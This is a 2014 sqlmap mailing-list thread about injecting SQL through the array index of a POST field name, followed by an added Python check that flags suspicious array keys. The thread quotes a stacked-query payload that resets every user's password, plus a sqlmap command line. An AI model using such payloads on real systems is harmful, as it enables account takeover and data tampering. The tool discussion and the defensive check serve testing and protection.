Nope, shouldn't have anything to do with it. How do you know it is exploitable? You also haven't tried upping the level with --level=5 which is different from risk
Sent from a computer

> On Oct 25, 2014, at 1:41 AM, a dehqan <dehqa...@gmail.com> wrote:
>
> Hi
>
> Thanks;
>
> Yes, of course it's exploitable.
>
> As you see, I have used --risk=3 before.
>
> I think Sqlmap isn't able to handle it properly because there is custom
> injection in name of parameter and also name is an array.
> Any opinion?
>
> Regards dehqan
>
>> On Fri, Oct 24, 2014 at 4:00 AM, Ryan Sears <rdse...@mtu.edu> wrote:
>> // Grrr, stupid gmail. Didn't reply-all first time :-P
>>
>> Are you sure it's exploitable? Try upping the --level and --risk.
>>
>> The #1* means the first * character you put into the --data parameter. It's
>> in lieu of saying something like "POST parameter 'derp' is not exploitable"
>> if you pass in --data="derp=testme" and ask it to test the "derp" parameter.
>>
>> Ryan
>>
>>> On Thu, Oct 23, 2014 at 5:14 AM, a dehqan <dehqa...@gmail.com> wrote:
>>> Thanks man;
>>>
>>> I want to send an array with query in its index as value of "name" POST
>>> variable.
>>>
>>> Remember, if I want to inject it manually I should try
>>>
>>> <input type="text" id="edit-name" name="name[1 ;UPDATE {users} SET pass=
>>> 'test123'; -- ]" value="" size="60" maxlength="60" class="form-text
>>> required error">
>>>
>>> So tried (sqlmap/1.0-dev):
>>>
>>> python sqlmap.py -u "http://localhost//?id=n&ssid=w" --data="name[0*]=name"
>>> --risk=3 --flush-session --dbms=mysql
>>>
>>> Sqlmap returns this error:
>>>
>>> [WARNING] (custom) POST parameter '#1*' is not injectable
>>>
>>> What does # mean here?
>>>
>>> And how to make it work under sqlmap?
>>>
>>> Regards
>>>
>>>> On Thu, Oct 23, 2014 at 11:00 AM, Miroslav Stampar
>>>> <miroslav.stam...@gmail.com> wrote:
>>>> Hi.
>>>>
>>>> You need to put a custom injection mark * at the place where you want
>>>> sqlmap to inject. For example:
>>>>
>>>> ...name[1*]
>>>>
>>>> Bye
>>>>
>>>> p.s. your example with SELECT is not a proper one as queries are usually
>>>> not supported in stacking
>>>>
>>>>> On Thu, Oct 23, 2014 at 7:43 AM, a dehqan <dehqa...@gmail.com> wrote:
>>>>> Hi Guys,
>>>>>
>>>>> Is Sqlmap able to send an array instead of string while injecting?
>>>>>
>>>>> Like situation we have html form and we want manually send post variable
>>>>> 'name' this way (value is obtained from array):
>>>>>
>>>>> name="name[1 ;select * from users -- ]
>>>>>
>>>>> I want to do it with Sqlmap, but how?
>>>>>
>>>>> Regards dehqan
>>>>
>>>> --
>>>> Miroslav Stampar
>>>> http://about.me/stamparm
>>>
>>> ------------------------------------------------------------------------------
>>>
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sqlmap-users@lists.sourceforge.net
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
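Added example, not part of the thread and not sqlmap code: the case discussed above puts the payload in the array index of a POST field name rather than in its value, so a server-side check has to look at the keys inside the brackets. The function names and the allow-list pattern are assumptions made for this sketch, and the request bodies are constructed samples.

```python
import re
from urllib.parse import parse_qsl, urlencode

# Allow-list for one array key: empty (name[]) or a short identifier-like token.
# This policy is an assumption of the example; adjust it to what the form expects.
SAFE_KEY = re.compile(r"[A-Za-z0-9_-]{0,64}")
BRACKET = re.compile(r"\[([^\[\]]*)\]")


def array_keys(name):
    """Split 'a[b][c]' into ('a', ['b', 'c']); return None if brackets are malformed."""
    base, sep, rest = name.partition("[")
    if "]" in base:
        return None
    if not sep:
        return base, []
    rest = sep + rest
    keys = BRACKET.findall(rest)
    # Re-assemble the keys: any leftover text means unbalanced or stray brackets.
    if "".join("[%s]" % k for k in keys) != rest:
        return None
    return base, keys


def suspicious_params(body):
    """Return (field name, reason) for every field whose array keys fail the allow-list."""
    findings = []
    for name, _value in parse_qsl(body, keep_blank_values=True):
        parsed = array_keys(name)
        if parsed is None:
            findings.append((name, "malformed brackets"))
            continue
        for key in parsed[1]:
            if not SAFE_KEY.fullmatch(key):
                findings.append((name, "unexpected array key"))
                break
    return findings


# Constructed request bodies; the second reuses the field name quoted in the thread.
SAMPLES = [
    urlencode({"name[0]": "alice", "pass": "x"}),
    urlencode({"name[1 ;UPDATE {users} SET pass= 'test123'; -- ]": "", "pass": "x"}),
    "name%5B1=alice",  # opening bracket never closed
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(suspicious_params(body) or "ok")
```

A check like this belongs in front of any code that builds query placeholders or column names from array keys; it complements parameterized queries and does not replace them.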